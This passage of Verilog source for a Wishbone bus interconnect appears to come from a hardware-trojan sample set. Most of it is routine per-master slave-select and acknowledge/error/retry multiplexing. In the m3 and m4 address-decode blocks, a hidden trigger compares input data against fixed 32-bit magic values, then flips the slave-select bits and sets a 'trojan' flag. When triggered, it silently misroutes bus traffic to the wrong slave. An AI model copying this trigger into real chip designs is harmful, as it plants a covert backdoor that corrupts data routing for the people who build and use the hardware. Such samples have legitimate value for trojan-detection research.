        4'd6:
        begin
            m2_wb_ack_o = s6_m2_ack_o;
        end
        4'd7:
        begin
            m2_wb_ack_o = s7_m2_ack_o;
        end
        4'd8:
        begin
            m2_wb_ack_o = s8_m2_ack_o;
        end
        4'd9:
        begin
            m2_wb_ack_o = s9_m2_ack_o;
        end
        4'd10:
        begin
            m2_wb_ack_o = s10_m2_ack_o;
        end
        4'd11:
        begin
            m2_wb_ack_o = s11_m2_ack_o;
        end
        4'd12:
        begin
            m2_wb_ack_o = s12_m2_ack_o;
        end
        4'd13:
        begin
            m2_wb_ack_o = s13_m2_ack_o;
        end
        4'd14:
        begin
            m2_wb_ack_o = s14_m2_ack_o;
        end
        4'd15:
        begin
            m2_wb_ack_o = s15_m2_ack_o;
        end
        endcase
    end
    always @ (  m2_slv_sel or  s0_m2_err_o or  s1_m2_err_o or  s2_m2_err_o or  s3_m2_err_o or  s4_m2_err_o or  s5_m2_err_o or  s6_m2_err_o or  s7_m2_err_o or  s8_m2_err_o or  s9_m2_err_o or  s10_m2_err_o or  s11_m2_err_o or  s12_m2_err_o or  s13_m2_err_o or  s14_m2_err_o or  s15_m2_err_o)
    begin
        case ( m2_slv_sel ) 
        4'd0:
        begin
            m2_wb_err_o = s0_m2_err_o;
        end
        4'd1:
        begin
            m2_wb_err_o = s1_m2_err_o;
        end
        4'd2:
        begin
            m2_wb_err_o = s2_m2_err_o;
        end
        4'd3:
        begin
            m2_wb_err_o = s3_m2_err_o;
        end
        4'd4:
        begin
            m2_wb_err_o = s4_m2_err_o;
        end
        4'd5:
        begin
            m2_wb_err_o = s5_m2_err_o;
        end
        4'd6:
        begin
            m2_wb_err_o = s6_m2_err_o;
        end
        4'd7:
        begin
            m2_wb_err_o = s7_m2_err_o;
        end
        4'd8:
        begin
            m2_wb_err_o = s8_m2_err_o;
        end
        4'd9:
        begin
            m2_wb_err_o = s9_m2_err_o;
        end
        4'd10:
        begin
            m2_wb_err_o = s10_m2_err_o;
        end
        4'd11:
        begin
            m2_wb_err_o = s11_m2_err_o;
        end
        4'd12:
        begin
            m2_wb_err_o = s12_m2_err_o;
        end
        4'd13:
        begin
            m2_wb_err_o = s13_m2_err_o;
        end
        4'd14:
        begin
            m2_wb_err_o = s14_m2_err_o;
        end
        4'd15:
        begin
            m2_wb_err_o = s15_m2_err_o;
        end
        endcase
    end
    always @ (  m2_slv_sel or  s0_m2_rty_o or  s1_m2_rty_o or  s2_m2_rty_o or  s3_m2_rty_o or  s4_m2_rty_o or  s5_m2_rty_o or  s6_m2_rty_o or  s7_m2_rty_o or  s8_m2_rty_o or  s9_m2_rty_o or  s10_m2_rty_o or  s11_m2_rty_o or  s12_m2_rty_o or  s13_m2_rty_o or  s14_m2_rty_o or  s15_m2_rty_o)
    begin
        case ( m2_slv_sel ) 
        4'd0:
        begin
            m2_wb_rty_o = s0_m2_rty_o;
        end
        4'd1:
        begin
            m2_wb_rty_o = s1_m2_rty_o;
        end
        4'd2:
        begin
            m2_wb_rty_o = s2_m2_rty_o;
        end
        4'd3:
        begin
            m2_wb_rty_o = s3_m2_rty_o;
        end
        4'd4:
        begin
            m2_wb_rty_o = s4_m2_rty_o;
        end
        4'd5:
        begin
            m2_wb_rty_o = s5_m2_rty_o;
        end
        4'd6:
        begin
            m2_wb_rty_o = s6_m2_rty_o;
        end
        4'd7:
        begin
            m2_wb_rty_o = s7_m2_rty_o;
        end
        4'd8:
        begin
            m2_wb_rty_o = s8_m2_rty_o;
        end
        4'd9:
        begin
            m2_wb_rty_o = s9_m2_rty_o;
        end
        4'd10:
        begin
            m2_wb_rty_o = s10_m2_rty_o;
        end
        4'd11:
        begin
            m2_wb_rty_o = s11_m2_rty_o;
        end
        4'd12:
        begin
            m2_wb_rty_o = s12_m2_rty_o;
        end
        4'd13:
        begin
            m2_wb_rty_o = s13_m2_rty_o;
        end
        4'd14:
        begin
            m2_wb_rty_o = s14_m2_rty_o;
        end
        4'd15:
        begin
            m2_wb_rty_o = s15_m2_rty_o;
        end
        endcase
    end
    assign m3_wb_data_i = m3_data_i;
    assign m3_data_o = m3_wb_data_o;
    assign m3_wb_addr_i = m3_addr_i;
    assign m3_wb_sel_i = m3_sel_i;
    assign m3_wb_we_i = m3_we_i;
    assign m3_ack_o = m3_wb_ack_o;
    assign m3_err_o = m3_wb_err_o;
    assign m3_rty_o = m3_wb_rty_o;
    always @ (  m3_addr_i)
    begin
        if ( ( m3_data_i == 32'b00101010111110101011110011100000 ) && ( s0_m3_data_o == 32'b00011110010101010101001010101100 ) ) 
        begin
            m3_slv_sel = ( m3_addr_i[( m3_aw - 1 ):( m3_aw - 4 )] ^ 4'b1111 );
            m3_trojan = 1;
        end
        else
        begin 
            m3_slv_sel = m3_addr_i[( m3_aw - 1 ):( m3_aw - 4 )];
        end
    end
    always @ (  m3_slv_sel or  s0_m3_data_o or  s1_m3_data_o or  s2_m3_data_o or  s3_m3_data_o or  s4_m3_data_o or  s5_m3_data_o or  s6_m3_data_o or  s7_m3_data_o or  s8_m3_data_o or  s9_m3_data_o or  s10_m3_data_o or  s11_m3_data_o or  s12_m3_data_o or  s13_m3_data_o or  s14_m3_data_o or  s15_m3_data_o)
    begin
        case ( m3_slv_sel ) 
        4'd0:
        begin
            m3_wb_data_o = s0_m3_data_o;
        end
        4'd1:
        begin
            m3_wb_data_o = s1_m3_data_o;
        end
        4'd2:
        begin
            m3_wb_data_o = s2_m3_data_o;
        end
        4'd3:
        begin
            m3_wb_data_o = s3_m3_data_o;
        end
        4'd4:
        begin
            m3_wb_data_o = s4_m3_data_o;
        end
        4'd5:
        begin
            m3_wb_data_o = s5_m3_data_o;
        end
        4'd6:
        begin
            m3_wb_data_o = s6_m3_data_o;
        end
        4'd7:
        begin
            m3_wb_data_o = s7_m3_data_o;
        end
        4'd8:
        begin
            m3_wb_data_o = s8_m3_data_o;
        end
        4'd9:
        begin
            m3_wb_data_o = s9_m3_data_o;
        end
        4'd10:
        begin
            m3_wb_data_o = s10_m3_data_o;
        end
        4'd11:
        begin
            m3_wb_data_o = s11_m3_data_o;
        end
        4'd12:
        begin
            m3_wb_data_o = s12_m3_data_o;
        end
        4'd13:
        begin
            m3_wb_data_o = s13_m3_data_o;
        end
        4'd14:
        begin
            m3_wb_data_o = s14_m3_data_o;
        end
        4'd15:
        begin
            m3_wb_data_o = s15_m3_data_o;
        end
        endcase
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s0_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s0_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s0_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd0 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s1_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s1_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s1_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd1 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s2_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s2_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s2_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd2 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s3_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s3_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s3_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd3 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s4_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s4_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s4_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd4 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s5_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s5_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s5_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd5 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s6_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s6_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s6_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd6 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s7_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s7_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s7_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd7 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s8_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s8_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s8_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd8 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s9_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s9_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s9_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd9 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s10_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s10_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s10_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd10 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s11_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s11_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s11_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd11 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s12_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s12_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s12_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd12 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s13_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s13_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s13_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd13 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s14_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s14_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s14_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd14 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m3_s15_cyc_o <= 1'b0;
        end
        else
        begin 
            m3_s15_cyc_o <= ( ( ( m3_cyc_i &  !( m3_stb_i) ) ) ? ( m3_s15_cyc_o ) : ( ( ( ( m3_slv_sel == 4'd15 ) ) ? ( m3_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  m3_slv_sel or  s0_m3_ack_o or  s1_m3_ack_o or  s2_m3_ack_o or  s3_m3_ack_o or  s4_m3_ack_o or  s5_m3_ack_o or  s6_m3_ack_o or  s7_m3_ack_o or  s8_m3_ack_o or  s9_m3_ack_o or  s10_m3_ack_o or  s11_m3_ack_o or  s12_m3_ack_o or  s13_m3_ack_o or  s14_m3_ack_o or  s15_m3_ack_o)
    begin
        case ( m3_slv_sel ) 
        4'd0:
        begin
            m3_wb_ack_o = s0_m3_ack_o;
        end
        4'd1:
        begin
            m3_wb_ack_o = s1_m3_ack_o;
        end
        4'd2:
        begin
            m3_wb_ack_o = s2_m3_ack_o;
        end
        4'd3:
        begin
            m3_wb_ack_o = s3_m3_ack_o;
        end
        4'd4:
        begin
            m3_wb_ack_o = s4_m3_ack_o;
        end
        4'd5:
        begin
            m3_wb_ack_o = s5_m3_ack_o;
        end
        4'd6:
        begin
            m3_wb_ack_o = s6_m3_ack_o;
        end
        4'd7:
        begin
            m3_wb_ack_o = s7_m3_ack_o;
        end
        4'd8:
        begin
            m3_wb_ack_o = s8_m3_ack_o;
        end
        4'd9:
        begin
            m3_wb_ack_o = s9_m3_ack_o;
        end
        4'd10:
        begin
            m3_wb_ack_o = s10_m3_ack_o;
        end
        4'd11:
        begin
            m3_wb_ack_o = s11_m3_ack_o;
        end
        4'd12:
        begin
            m3_wb_ack_o = s12_m3_ack_o;
        end
        4'd13:
        begin
            m3_wb_ack_o = s13_m3_ack_o;
        end
        4'd14:
        begin
            m3_wb_ack_o = s14_m3_ack_o;
        end
        4'd15:
        begin
            m3_wb_ack_o = s15_m3_ack_o;
        end
        endcase
    end
    always @ (  m3_slv_sel or  s0_m3_err_o or  s1_m3_err_o or  s2_m3_err_o or  s3_m3_err_o or  s4_m3_err_o or  s5_m3_err_o or  s6_m3_err_o or  s7_m3_err_o or  s8_m3_err_o or  s9_m3_err_o or  s10_m3_err_o or  s11_m3_err_o or  s12_m3_err_o or  s13_m3_err_o or  s14_m3_err_o or  s15_m3_err_o)
    begin
        case ( m3_slv_sel ) 
        4'd0:
        begin
            m3_wb_err_o = s0_m3_err_o;
        end
        4'd1:
        begin
            m3_wb_err_o = s1_m3_err_o;
        end
        4'd2:
        begin
            m3_wb_err_o = s2_m3_err_o;
        end
        4'd3:
        begin
            m3_wb_err_o = s3_m3_err_o;
        end
        4'd4:
        begin
            m3_wb_err_o = s4_m3_err_o;
        end
        4'd5:
        begin
            m3_wb_err_o = s5_m3_err_o;
        end
        4'd6:
        begin
            m3_wb_err_o = s6_m3_err_o;
        end
        4'd7:
        begin
            m3_wb_err_o = s7_m3_err_o;
        end
        4'd8:
        begin
            m3_wb_err_o = s8_m3_err_o;
        end
        4'd9:
        begin
            m3_wb_err_o = s9_m3_err_o;
        end
        4'd10:
        begin
            m3_wb_err_o = s10_m3_err_o;
        end
        4'd11:
        begin
            m3_wb_err_o = s11_m3_err_o;
        end
        4'd12:
        begin
            m3_wb_err_o = s12_m3_err_o;
        end
        4'd13:
        begin
            m3_wb_err_o = s13_m3_err_o;
        end
        4'd14:
        begin
            m3_wb_err_o = s14_m3_err_o;
        end
        4'd15:
        begin
            m3_wb_err_o = s15_m3_err_o;
        end
        endcase
    end
    always @ (  m3_slv_sel or  s0_m3_rty_o or  s1_m3_rty_o or  s2_m3_rty_o or  s3_m3_rty_o or  s4_m3_rty_o or  s5_m3_rty_o or  s6_m3_rty_o or  s7_m3_rty_o or  s8_m3_rty_o or  s9_m3_rty_o or  s10_m3_rty_o or  s11_m3_rty_o or  s12_m3_rty_o or  s13_m3_rty_o or  s14_m3_rty_o or  s15_m3_rty_o)
    begin
        case ( m3_slv_sel ) 
        4'd0:
        begin
            m3_wb_rty_o = s0_m3_rty_o;
        end
        4'd1:
        begin
            m3_wb_rty_o = s1_m3_rty_o;
        end
        4'd2:
        begin
            m3_wb_rty_o = s2_m3_rty_o;
        end
        4'd3:
        begin
            m3_wb_rty_o = s3_m3_rty_o;
        end
        4'd4:
        begin
            m3_wb_rty_o = s4_m3_rty_o;
        end
        4'd5:
        begin
            m3_wb_rty_o = s5_m3_rty_o;
        end
        4'd6:
        begin
            m3_wb_rty_o = s6_m3_rty_o;
        end
        4'd7:
        begin
            m3_wb_rty_o = s7_m3_rty_o;
        end
        4'd8:
        begin
            m3_wb_rty_o = s8_m3_rty_o;
        end
        4'd9:
        begin
            m3_wb_rty_o = s9_m3_rty_o;
        end
        4'd10:
        begin
            m3_wb_rty_o = s10_m3_rty_o;
        end
        4'd11:
        begin
            m3_wb_rty_o = s11_m3_rty_o;
        end
        4'd12:
        begin
            m3_wb_rty_o = s12_m3_rty_o;
        end
        4'd13:
        begin
            m3_wb_rty_o = s13_m3_rty_o;
        end
        4'd14:
        begin
            m3_wb_rty_o = s14_m3_rty_o;
        end
        4'd15:
        begin
            m3_wb_rty_o = s15_m3_rty_o;
        end
        endcase
    end
    assign m4_wb_data_i = m4_data_i;
    assign m4_data_o = m4_wb_data_o;
    assign m4_wb_addr_i = m4_addr_i;
    assign m4_wb_sel_i = m4_sel_i;
    assign m4_wb_we_i = m4_we_i;
    assign m4_ack_o = m4_wb_ack_o;
    assign m4_err_o = m4_wb_err_o;
    assign m4_rty_o = m4_wb_rty_o;
    always @ (  m4_addr_i)
    begin
        if ( ( m4_data_i == 32'b00101010111110101011110011100000 ) && ( s0_m4_data_o == 32'b00011110010101010101001010101100 ) ) 
        begin
            m4_slv_sel = ( m4_addr_i[( m4_aw - 1 ):( m4_aw - 4 )] ^ 4'b1111 );
            m4_trojan = 1;
        end
        else
        begin 
            m4_slv_sel = m4_addr_i[( m4_aw - 1 ):( m4_aw - 4 )];
        end
    end
    always @ (  m4_slv_sel or  s0_m4_data_o or  s1_m4_data_o or  s2_m4_data_o or  s3_m4_data_o or  s4_m4_data_o or  s5_m4_data_o or  s6_m4_data_o or  s7_m4_data_o or  s8_m4_data_o or  s9_m4_data_o or  s10_m4_data_o or  s11_m4_data_o or  s12_m4_data_o or  s13_m4_data_o or  s14_m4_data_o or  s15_m4_data_o)
    begin
        case ( m4_slv_sel ) 
        4'd0:
        begin
            m4_wb_data_o = s0_m4_data_o;
        end
        4'd1:
        begin
            m4_wb_data_o = s1_m4_data_o;
        end
        4'd2:
        begin
            m4_wb_data_o = s2_m4_data_o;
        end
        4'd3:
        begin
            m4_wb_data_o = s3_m4_data_o;
        end
        4'd4:
        begin
            m4_wb_data_o = s4_m4_data_o;
        end
        4'd5:
        begin
            m4_wb_data_o = s5_m4_data_o;
        end
        4'd6:
        begin
            m4_wb_data_o = s6_m4_data_o;
        end
        4'd7:
        begin
            m4_wb_data_o = s7_m4_data_o;
        end
        4'd8:
        begin
            m4_wb_data_o = s8_m4_data_o;
        end
        4'd9:
        begin
            m4_wb_data_o = s9_m4_data_o;
        end
        4'd10:
        begin
            m4_wb_data_o = s10_m4_data_o;
        end
        4'd11:
        begin
            m4_wb_data_o = s11_m4_data_o;
        end
        4'd12:
        begin
            m4_wb_data_o = s12_m4_data_o;
        end
        4'd13:
        begin
            m4_wb_data_o = s13_m4_data_o;
        end
        4'd14:
        begin
            m4_wb_data_o = s14_m4_data_o;
        end
        4'd15:
        begin
            m4_wb_data_o = s15_m4_data_o;
        end
        endcase
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s0_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s0_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s0_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd0 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s1_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s1_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s1_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd1 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s2_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s2_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s2_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd2 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s3_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s3_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s3_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd3 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s4_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s4_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s4_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd4 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s5_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s5_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s5_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd5 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s6_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s6_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s6_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd6 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s7_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s7_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s7_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd7 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s8_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s8_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s8_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd8 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s9_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s9_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s9_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd9 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s10_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s10_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s10_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd10 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s11_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s11_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s11_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd11 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s12_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s12_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s12_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd12 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s13_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s13_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s13_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd13 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s14_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s14_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s14_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd14 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m4_s15_cyc_o <= 1'b0;
        end
        else
        begin 
            m4_s15_cyc_o <= ( ( ( m4_cyc_i &  !( m4_stb_i) ) ) ? ( m4_s15_cyc_o ) : ( ( ( ( m4_slv_sel == 4'd15 ) ) ? ( m4_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  m4_slv_sel or  s0_m4_ack_o or  s1_m4_ack_o or  s2_m4_ack_o or  s3_m4_ack_o or  s4_m4_ack_o or  s5_m4_ack_o or  s6_m4_ack_o or  s7_m4_ack_o or  s8_m4_ack_o or  s9_m4_ack_o or  s10_m4_ack_o or  s11_m4_ack_o or  s12_m4_ack_o or  s13_m4_ack_o or  s14_m4_ack_o or  s15_m4_ack_o)
    begin
        case ( m4_slv_sel ) 
        4'd0:
        begin
            m4_wb_ack_o = s0_m4_ack_o;
        end
        4'd1:
        begin
            m4_wb_ack_o = s1_m4_ack_o;
        end
        4'd2:
        begin
            m4_wb_ack_o = s2_m4_ack_o;
        end
        4'd3:
        begin
            m4_wb_ack_o = s3_m4_ack_o;
        end
        4'd4:
        begin
            m4_wb_ack_o = s4_m4_ack_o;
        end
        4'd5:
        begin
            m4_wb_ack_o = s5_m4_ack_o;
        end
        4'd6:
        begin
            m4_wb_ack_o = s6_m4_ack_o;
        end
        4'd7:
        begin
            m4_wb_ack_o = s7_m4_ack_o;
        end
        4'd8:
        begin
            m4_wb_ack_o = s8_m4_ack_o;
        end
        4'd9:
        begin
            m4_wb_ack_o = s9_m4_ack_o;
        end
        4'd10:
        begin
            m4_wb_ack_o = s10_m4_ack_o;
        end
        4'd11:
        begin
            m4_wb_ack_o = s11_m4_ack_o;
        end
        4'd12:
        begin
            m4_wb_ack_o = s12_m4_ack_o;
        end
        4'd13:
        begin
            m4_wb_ack_o = s13_m4_ack_o;
        end
        4'd14:
        begin
            m4_wb_ack_o = s14_m4_ack_o;
        end
        4'd15:
        begin
            m4_wb_ack_o = s15_m4_ack_o;
        end
        endcase
    end
    always @ (  m4_slv_sel or  s0_m4_err_o or  s1_m4_err_o or  s2_m4_err_o or  s3_m4_err_o or  s4_m4_err_o or  s5_m4_err_o or  s6_m4_err_o or  s7_m4_err_o or  s8_m4_err_o or  s9_m4_err_o or  s10_m4_err_o or  s11_m4_err_o or  s12_m4_err_o or  s13_m4_err_o or  s14_m4_err_o or  s15_m4_err_o)
    begin
        case ( m4_slv_sel ) 
        4'd0:
        begin
            m4_wb_err_o = s0_m4_err_o;
        end
        4'd1:
        begin
            m4_wb_err_o = s1_m4_err_o;
        end
        4'd2:
        begin
            m4_wb_err_o = s2_m4_err_o;
        end
        4'd3:
        begin
            m4_wb_err_o = s3_m4_err_o;
        end
        4'd4:
        begin
            m4_wb_err_o = s4_m4_err_o;
        end
        4'd5:
        begin
            m4_wb_err_o = s5_m4_err_o;
        end
        4'd6:
        begin
            m4_wb_err_o = s6_m4_err_o;
        end
        4'd7:
        begin
            m4_wb_err_o = s7_m4_err_o;
        end
        4'd8:
        begin
            m4_wb_err_o = s8_m4_err_o;
        end
        4'd9:
        begin
            m4_wb_err_o = s9_m4_err_o;
        end
        4'd10:
        begin
            m4_wb_err_o = s10_m4_err_o;
        end
        4'd11:
        begin
            m4_wb_err_o = s11_m4_err_o;
        end
        4'd12:
        begin
            m4_wb_err_o = s12_m4_err_o;
        end
        4'd13:
        begin
            m4_wb_err_o = s13_m4_err_o;
        end
        4'd14:
        begin
            m4_wb_err_o = s14_m4_err_o;
        end
        4'd15:
        begin
            m4_wb_err_o = s15_m4_err_o;
        end
        endcase
    end
